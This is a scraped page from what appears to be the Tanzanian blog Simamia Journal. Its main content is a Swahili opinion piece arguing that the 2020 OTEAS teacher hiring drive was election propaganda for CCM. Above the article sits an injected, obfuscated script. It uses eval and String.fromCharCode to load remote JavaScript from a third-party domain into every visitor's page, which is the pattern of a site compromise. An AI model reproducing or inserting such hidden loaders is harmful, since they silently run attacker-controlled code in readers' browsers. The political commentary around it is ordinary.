Recent Comments

UCHAMBUZI WA BICHIBUYE KUHUSU AJIRA ZA OTEAS

By Simamia Journal Sep 19, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

AJIRA ZA OTEAS ZIPO KISIASA NA KIPROPAGANDA!!!

Comrade:
Bichibuye Bilori Aaron.

Asalaam Alaykumu waungwana!
Leo napenda niseme kidogo kuhusu hizi ajira za walimu kwa mwaka 2020/2021, Online Teachers Employment Application System (OTEAS) kama zilivyotangazwa na Ofisi ya Rais-Tawala za Mikoa na Serikali za Mitaa (OR-TAMISEMI) mnamo tarehe 07-September, 2020.

Naomba niipongeze sana sana serikali kwa namna mbili, yaani kwa kuzingatia Uhitaji wa walimu uliopo katika shule zetu za umma na pili kuzingatia uwingi wa vijana waliosoma Ualimu kwa gharama kubwa sana na ambao wametapakaa mtaani bila ajira, hasa kwenye Utumishi wa umma! Naipongeza sana serikali hapo kwa kuyazingatia mambo hayo mawili. Hili ni suala zuri sana kwa vijana kupatiwa ajira, vile vile kutatua changamoto za ukosefu wa walimu katika shule za umma na hivyo kuchagiza ustawi wa elimu yetu!

Nirejelee somo tajwa kwenye andiko hili.

@Ni kwa nini watu wanahofia utolewaji huu wa ajira na kuzihusisha na siasa, hususani uchaguzi!!?
@Kwa nini wadau wengi wanakosa imani na fursa hizi za ajira ambazo zilitarajiwa kuwa ‘Lulu’ kwa waliozisubiria kwa miaka mingi!?

Kwanza nitangulize Ufuatiliaji binafsi wa masuala yanayohusiana na Uombaji wa hizi ajira na walengwa wa ajira hizo, yaani wahitimu wa Ualimu. Niseme tu ufuatiliaji wangu umehitimika kwa kugundua kuwa wengi wamekwisha kujikatia tamaa ya kupata fursa kwenye utumishi wa Umma (serikalini). Ukimwuliza kijana mhitimu anakuambia amekwisha kuwa na namna mbadala ya maisha na kuichukulia safari yake ndefu ya kielimu kama hasara, hasa kwa wale waliosoma wakilenga kuajiriwa na ambao kimsingi ndio wengi.
Pia wapo ambao wamekuwa wakiomba kila ajira zinapotangazwa na hawajawahi kupata na hivyo kuvunjika moyo wakaondokewa na tumaini.

Wengi niliozungumza nao Wamelichukukia ‘Kisiasa’ na ‘Kipropaganda’ zaidi zinazolenga Ushindi wa Chama tawala, ‘CCM’ katika Uchaguzi wa mwaka huu! Hapa nitaelezea kwa mtazamo wangu na kwa mapokeo ya wadau wenyewe.

Zipo hoja nyingi sana ngumu kwa Ccm kuzijibia ili kueleweka kwa wananchi. Mojawapo ni hii ya ‘ajira’! Nyengine zipo kama vile Uhitaji wa katiba mpya, Uhuru wa Mahakama ya Tanzania, Uhuru wa maoni binafsi na vyombo vya habari, Utekaji, Mauaji na kupotea potea kwa watu, kutoongezwa mishahara kwa watumishi wa umma, marndeleo yasiyogusa maisha ya mwananchi moja kwa moja n.k. Aidha, wacha nijikite kwenye hizi OTEAS na uhusuano wake na Uchaguzi Mkuu, 2020.

Ni kweli Chama tawala, ‘CCM’ kimekuwa kikishindwa kueleza kinaghaubagha kuhusu ajira za vijana weengi sana waliopo mtaani na hivyo kuwadharaulisha, na kundi hilo la ukosefu wa ajira limekuwa linaongozwa na vijana waliosoma Ualimu na kuhitimu kati ya mwaka 2015 Mpaka sasa. Kama kuna vijinafasi vilitokea basi niseme tu vilikiwa kwa mafungu na kwa wachache (minority population) wa kundi hilo mithili ya kubadilisha rangi ya bahari kwa rangi ya kwenye kikombe. Kila kona, kila uchochoro na kila kijiji na mitaa utakutana na mhitimu wa ualimu ambaye hajapata ajira. Ukiongea nae atakujibu kama nilivyodokeza, just in no Hope, in despair.

Kwa kuwa Upinzani umebeba Ukosefu wa ajira kama hoja mhimu, basi serikali kwa ushirika na chama kinachoiunda wamehaha kueleweka na wamekuja na mwarobaini wa kuwa keep wahitimu in hope kwa kipindi chote cha kampeni. This is evident kwa barua ya extension ya muda wa Applications hizo! Na kusema kweli wamepatia kuwanyamazisha wahitimu wenyewe, jamii na wanasiasa. Toka walipotangaza kufunguliwa kwa dirisha la ajira kwa walimu (OTEAS, 2020) tumeona hoja hiyo ikififia kwenye majukwaa ya Upinzani.
TunduLissu, Membe, Propesa Lipumbavu na hata Rungwe ubwabwa na wengine wamelipunguza majukwaani mwao!

Niseme tu kwamba hii imekaa kisiasa na kipropaganda kufisha na kuficha hoja zisizojibika majukwaani na ambazo zinawwza kushawishi wananchi kutoipigia kura ccm na hivyo kupunguza kile kinachoitwa ‘ushindi wa Kishindo’ wa CCM Tanzania.

Wakati OTEAS inaanza, kila mwombaji angeweza kujiona amekuwa wa ngapi kufanya application yake. Ni baada tu ya kugundua wanawakatisha tamaa waombaji kwa idadi iliyokwishafikiwa (walikuwa wamefikia 38 elfu na kadhalika) mfumo wa OTEAS uliondoa notification iliyokuwa ikionesha idadi ya waombaji waliokwisha kamilisha maombi yao. Mpaka sasa watu wanaendelea kuingezeka kumya kimya. Nina imani kwa sasa waombaji watakuwa wanakaribia takribani Sabini elfu ama zaidi kati ya elfu kumi na mbili wanaohitajika, na maombi yanaingia kwa makumi na mamia kila wakati, kula leo.

MY_TAKE:
Ni wito wangu kwa serikali kutowajaribu wahitimu wenye uhitaji wa ajira. Ni dhambi sana kumjaribu mtu mwenye Uhitaji. Napaza sauti kwa wale waliokidhi vigezo kutoachwa na hamu ya kupata ajira hasa kwenye utumishi wa umma. Izingatiwe kwamba kila mwenye uhitaji na mwenye vigezo anayo haki ya Kulitumikia taifa lake katika Utumishi wa Umma!
Ipo dhana isemayo,
“Akili yoyote kubwa ni mali ya serikali, hali kadhalika akili ndogo ni hasara ya serikali ”
Naamini kwamba Miongoni mwa hawa vijana waliopo mtaani, wakichekwa na wenzao waliofeli darasa la saba, kidato cha nne, sita na kadhalika na kisha wakaanza utafutaji na kuwaacha kimafanikio ya umiliki, Wamo vijana wazuri na wachapakazi, wanaoweza kulisaidia taifa kutoka sehemu moja kwenda nyengine hususan kwenye Mfumo wa elimu unaopigiwa kelele kila uchao. Kama taifa tuzingatie hilo, tutoe ajira. Huku kutengenezeana matumaini fake ili kusukuma kipindi cha Uchaguzi mkuu upite siyo suluhisho la kulituliza tabaka la wasomi wa vyuo vyetu na vijana wetu.

Napita tu…. Aurevoire!!

Comrade:
Bichibuye Bilori Aaron ??‍♂️
+255743423200
Kahama, Tza
19-Sept, 2020

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv